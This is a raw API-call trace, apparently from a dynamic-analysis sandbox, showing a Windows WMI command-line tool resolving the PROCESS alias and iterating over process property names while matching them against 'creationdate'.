[0401.536] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0401.536] malloc (_Size=0x3a) returned 0x20cea0
[0401.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x20cea0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0401.536] free (_Block=0x20cea0)
[0401.536] malloc (_Size=0x18) returned 0x209760
[0401.536] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0401.536] SysStringLen (param_1="PROCESS") returned 0x7
[0401.536] memcpy (in: _Dst=0x2a6ed8, _Src=0x2c8f28, _Size=0x3a | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0401.536] memcpy (in: _Dst=0x2a6f10, _Src=0x2e4cb8, _Size=0x10 | out: _Dst=0x2a6f10) returned 0x2a6f10
[0401.536] malloc (_Size=0x18) returned 0x209660
[0401.536] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0401.536] SysStringLen (param_1="'") returned 0x1
[0401.536] memcpy (in: _Dst=0x2df748, _Src=0x2a6ed8, _Size=0x48 | out: _Dst=0x2df748) returned 0x2df748
[0401.537] memcpy (in: _Dst=0x2df78e, _Src=0x2e4c58, _Size=0x4 | out: _Dst=0x2df78e) returned 0x2df78e
[0401.537] free (_Block=0x209760)
[0401.537] free (_Block=0x209640)
[0401.537] free (_Block=0x2096c0)
[0401.537] free (_Block=0x209680)
[0401.537] IWbemServices:GetObject (in: This=0x2d6560, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0x16f158*=0x0, ppCallResult=0x0 | out: ppObject=0x16f158*=0x2c8c70, ppCallResult=0x0) returned 0x0
[0401.561] malloc (_Size=0x18) returned 0x209680
[0401.561] IWbemClassObject:Get (in: This=0x2c8c70, wszName="Formats", lFlags=0, pVal=0x16f1d8*(varType=0x0, wReserved1=0x778d, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2b80, varVal2=0xffa7c79c), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1d8*(varType=0x200d, wReserved1=0x778d, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e9480*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2c62c0, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0xffa7c79c), pType=0x0, plFlavor=0x0) returned 0x0
[0401.565] free (_Block=0x209680)
[0401.565] lstrlenW (lpString="SET") returned 3
[0401.565] lstrlenW (lpString="get") returned 3
[0401.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0401.565] SafeArrayGetLBound (in: psa=0x2e9480, nDim=0x1, plLbound=0x16f170 | out: plLbound=0x16f170) returned 0x0
[0401.565] SafeArrayGetUBound (in: psa=0x2e9480, nDim=0x1, plUbound=0x16f16c | out: plUbound=0x16f16c) returned 0x0
[0401.565] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f160, pv=0x16f148 | out: pv=0x16f148) returned 0x0
[0401.566] malloc (_Size=0x18) returned 0x209680
[0401.566] IWbemClassObject:Get (in: This=0x2c9140, wszName="Name", lFlags=0, pVal=0x16f1b8*(varType=0x0, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x3, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1b8*(varType=0x8, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1="STATUS", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.566] free (_Block=0x209680)
[0401.566] malloc (_Size=0x18) returned 0x209680
[0401.566] lstrlenW (lpString="FULL") returned 4
[0401.566] lstrlenW (lpString="STATUS") returned 6
[0401.566] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0401.566] free (_Block=0x209680)
[0401.566] IUnknown:Release (This=0x2c9140) returned 0x1
[0401.566] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f160, pv=0x16f148 | out: pv=0x16f148) returned 0x0
[0401.567] malloc (_Size=0x18) returned 0x209680
[0401.567] IWbemClassObject:Get (in: This=0x2c93f0, wszName="Name", lFlags=0, pVal=0x16f1b8*(varType=0x0, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x2e4d18, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1b8*(varType=0x8, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1="MEMORY", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.567] free (_Block=0x209680)
[0401.567] malloc (_Size=0x18) returned 0x209680
[0401.567] lstrlenW (lpString="FULL") returned 4
[0401.567] lstrlenW (lpString="MEMORY") returned 6
[0401.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MEMORY", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0401.567] free (_Block=0x209680)
[0401.567] IUnknown:Release (This=0x2c93f0) returned 0x1
[0401.567] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f160, pv=0x16f148 | out: pv=0x16f148) returned 0x0
[0401.567] malloc (_Size=0x18) returned 0x209680
[0401.568] IWbemClassObject:Get (in: This=0x2c96a0, wszName="Name", lFlags=0, pVal=0x16f1b8*(varType=0x0, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x2e4d18, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1b8*(varType=0x8, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1="FULL", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.568] free (_Block=0x209680)
[0401.568] malloc (_Size=0x18) returned 0x209680
[0401.568] lstrlenW (lpString="FULL") returned 4
[0401.568] lstrlenW (lpString="FULL") returned 4
[0401.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
[0401.568] free (_Block=0x209680)
[0401.568] malloc (_Size=0x18) returned 0x209680
[0401.568] IWbemClassObject:Get (in: This=0x2c96a0, wszName="Properties", lFlags=0, pVal=0x16f1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2ac0, varVal2=0x2002a8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1f0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e95c0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2c9950, rgsabound=((cElements=0x28, lLbound=0))), varVal2=0x2002a8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.572] free (_Block=0x209680)
[0401.572] SafeArrayGetLBound (in: psa=0x2e95c0, nDim=0x1, plLbound=0x16f180 | out: plLbound=0x16f180) returned 0x0
[0401.572] SafeArrayGetUBound (in: psa=0x2e95c0, nDim=0x1, plUbound=0x16f188 | out: plUbound=0x16f188) returned 0x0
[0401.573] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.573] malloc (_Size=0x18) returned 0x209680
[0401.573] IWbemClassObject:Get (in: This=0x32d710, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x0, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.573] free (_Block=0x209680)
[0401.573] malloc (_Size=0x18) returned 0x209680
[0401.573] IWbemClassObject:Get (in: This=0x32d710, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.573] free (_Block=0x209680)
[0401.573] malloc (_Size=0x18) returned 0x209680
[0401.573] lstrlenW (lpString="CommandLine") returned 11
[0401.573] lstrlenW (lpString="creationdate") returned 12
[0401.573] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CommandLine", cchCount2=11) returned 3
[0401.574] free (_Block=0x209680)
[0401.574] IUnknown:Release (This=0x32d710) returned 0x1
[0401.574] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.574] malloc (_Size=0x18) returned 0x209680
[0401.574] IWbemClassObject:Get (in: This=0x32db80, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.574] free (_Block=0x209680)
[0401.574] malloc (_Size=0x18) returned 0x209680
[0401.574] IWbemClassObject:Get (in: This=0x32db80, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.574] free (_Block=0x209680)
[0401.574] malloc (_Size=0x18) returned 0x209680
[0401.574] lstrlenW (lpString="CSName") returned 6
[0401.574] lstrlenW (lpString="creationdate") returned 12
[0401.574] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CSName", cchCount2=6) returned 1
[0401.575] free (_Block=0x209680)
[0401.575] IUnknown:Release (This=0x32db80) returned 0x1
[0401.575] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.575] malloc (_Size=0x18) returned 0x209680
[0401.575] IWbemClassObject:Get (in: This=0x32e080, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.575] free (_Block=0x209680)
[0401.575] malloc (_Size=0x18) returned 0x209680
[0401.575] IWbemClassObject:Get (in: This=0x32e080, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.575] free (_Block=0x209680)
[0401.575] malloc (_Size=0x18) returned 0x209680
[0401.576] lstrlenW (lpString="Description") returned 11
[0401.576] lstrlenW (lpString="creationdate") returned 12
[0401.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Description", cchCount2=11) returned 1
[0401.576] free (_Block=0x209680)
[0401.576] IUnknown:Release (This=0x32e080) returned 0x1
[0401.576] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.576] malloc (_Size=0x18) returned 0x209680
[0401.576] IWbemClassObject:Get (in: This=0x32e5b0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.576] free (_Block=0x209680)
[0401.576] malloc (_Size=0x18) returned 0x209680
[0401.576] IWbemClassObject:Get (in: This=0x32e5b0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.576] free (_Block=0x209680)
[0401.577] malloc (_Size=0x18) returned 0x209680
[0401.577] lstrlenW (lpString="ExecutablePath") returned 14
[0401.577] lstrlenW (lpString="creationdate") returned 12
[0401.577] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutablePath", cchCount2=14) returned 1
[0401.577] free (_Block=0x209680)
[0401.577] IUnknown:Release (This=0x32e5b0) returned 0x1
[0401.577] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.577] malloc (_Size=0x18) returned 0x209680
[0401.577] IWbemClassObject:Get (in: This=0x32ed20, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.577] free (_Block=0x209680)
[0401.577] malloc (_Size=0x18) returned 0x209680
[0401.577] IWbemClassObject:Get (in: This=0x32ed20, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.578] free (_Block=0x209680)
[0401.578] malloc (_Size=0x18) returned 0x209680
[0401.578] lstrlenW (lpString="ExecutionState") returned 14
[0401.578] lstrlenW (lpString="creationdate") returned 12
[0401.578] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutionState", cchCount2=14) returned 1
[0401.578] free (_Block=0x209680)
[0401.578] IUnknown:Release (This=0x32ed20) returned 0x1
[0401.578] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.578] malloc (_Size=0x18) returned 0x209680
[0401.578] IWbemClassObject:Get (in: This=0x32f210, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.578] free (_Block=0x209680)
[0401.578] malloc (_Size=0x18) returned 0x209680
[0401.579] IWbemClassObject:Get (in: This=0x32f210, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.579] free (_Block=0x209680)
[0401.579] malloc (_Size=0x18) returned 0x209680
[0401.579] lstrlenW (lpString="Handle") returned 6
[0401.579] lstrlenW (lpString="creationdate") returned 12
[0401.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Handle", cchCount2=6) returned 1
[0401.579] free (_Block=0x209680)
[0401.579] IUnknown:Release (This=0x32f210) returned 0x1
[0401.579] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.579] malloc (_Size=0x18) returned 0x209680
[0401.579] IWbemClassObject:Get (in: This=0x32f850, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.580] free (_Block=0x209680)
[0401.580] malloc (_Size=0x18) returned 0x209680
[0401.580] IWbemClassObject:Get (in: This=0x32f850, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.580] free (_Block=0x209680)
[0401.580] malloc (_Size=0x18) returned 0x209680
[0401.580] lstrlenW (lpString="HandleCount") returned 11
[0401.580] lstrlenW (lpString="creationdate") returned 12
[0401.580] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="HandleCount", cchCount2=11) returned 1
[0401.580] free (_Block=0x209680)
[0401.580] IUnknown:Release (This=0x32f850) returned 0x1
[0401.580] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.581] malloc (_Size=0x18) returned 0x209680
[0401.581] IWbemClassObject:Get (in: This=0x32fda0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.581] free (_Block=0x209680)
[0401.581] malloc (_Size=0x18) returned 0x209680
[0401.581] IWbemClassObject:Get (in: This=0x32fda0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.581] free (_Block=0x209680)
[0401.581] malloc (_Size=0x18) returned 0x209680
[0401.581] lstrlenW (lpString="InstallDate") returned 11
[0401.581] lstrlenW (lpString="creationdate") returned 12
[0401.581] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="InstallDate", cchCount2=11) returned 1
[0401.582] free (_Block=0x209680)
[0401.582] IUnknown:Release (This=0x32fda0) returned 0x1
[0401.582] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.582] malloc (_Size=0x18) returned 0x209680
[0401.582] IWbemClassObject:Get (in: This=0x3302f0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.582] free (_Block=0x209680)
[0401.582] malloc (_Size=0x18) returned 0x209680
[0401.582] IWbemClassObject:Get (in: This=0x3302f0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.582] free (_Block=0x209680)
[0401.582] malloc (_Size=0x18) returned 0x209680
[0401.582] lstrlenW (lpString="KernelModeTime") returned 14
[0401.583] lstrlenW (lpString="creationdate") returned 12
[0401.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="KernelModeTime", cchCount2=14) returned 1
[0401.583] free (_Block=0x209680)
[0401.583] IUnknown:Release (This=0x3302f0) returned 0x1
[0401.583] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.583] malloc (_Size=0x18) returned 0x209680
[0401.583] IWbemClassObject:Get (in: This=0x3305a0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.583] free (_Block=0x209680)
[0401.583] malloc (_Size=0x18) returned 0x209680
[0401.583] IWbemClassObject:Get (in: This=0x3305a0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.584] free (_Block=0x209680)
[0401.584] malloc (_Size=0x18) returned 0x209680
[0401.584] lstrlenW (lpString="MaximumWorkingSetSize") returned 21
[0401.584] lstrlenW (lpString="creationdate") returned 12
[0401.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MaximumWorkingSetSize", cchCount2=21) returned 1
[0401.584] free (_Block=0x209680)
[0401.584] IUnknown:Release (This=0x3305a0) returned 0x1
[0401.584] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.584] malloc (_Size=0x18) returned 0x209680
[0401.584] IWbemClassObject:Get (in: This=0x330850, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.584] free (_Block=0x209680)
[0401.584] malloc (_Size=0x18) returned 0x209680
[0401.585] IWbemClassObject:Get (in: This=0x330850, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.585] free (_Block=0x209680)
[0401.585] malloc (_Size=0x18) returned 0x209680
[0401.585] lstrlenW (lpString="MinimumWorkingSetSize") returned 21
[0401.585] lstrlenW (lpString="creationdate") returned 12
[0401.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MinimumWorkingSetSize", cchCount2=21) returned 1
[0401.585] free (_Block=0x209680)
[0401.585] IUnknown:Release (This=0x330850) returned 0x1
[0401.585] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.585] malloc (_Size=0x18) returned 0x209680
[0401.585] IWbemClassObject:Get (in: This=0x330b00, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.586] free (_Block=0x209680)
[0401.586] malloc (_Size=0x18) returned 0x209680
[0401.586] IWbemClassObject:Get (in: This=0x330b00, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.586] free (_Block=0x209680)
[0401.586] malloc (_Size=0x18) returned 0x209680
[0401.586] lstrlenW (lpString="Name") returned 4
[0401.586] lstrlenW (lpString="creationdate") returned 12
[0401.586] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Name", cchCount2=4) returned 1
[0401.586] free (_Block=0x209680)
[0401.586] IUnknown:Release (This=0x330b00) returned 0x1
[0401.586] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.586] malloc (_Size=0x18) returned 0x209680
[0401.587] IWbemClassObject:Get (in: This=0x330db0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.587] free (_Block=0x209680)
[0401.587] malloc (_Size=0x18) returned 0x209680
[0401.587] IWbemClassObject:Get (in: This=0x330db0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.587] free (_Block=0x209680)
[0401.587] malloc (_Size=0x18) returned 0x209680
[0401.587] lstrlenW (lpString="OSName") returned 6
[0401.587] lstrlenW (lpString="creationdate") returned 12
[0401.587] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OSName", cchCount2=6) returned 1
[0401.587] free (_Block=0x209680)
[0401.588] IUnknown:Release (This=0x330db0) returned 0x1
[0401.588] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.588] malloc (_Size=0x18) returned 0x209680
[0401.588] IWbemClassObject:Get (in: This=0x331060, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.588] free (_Block=0x209680)
[0401.588] malloc (_Size=0x18) returned 0x209680
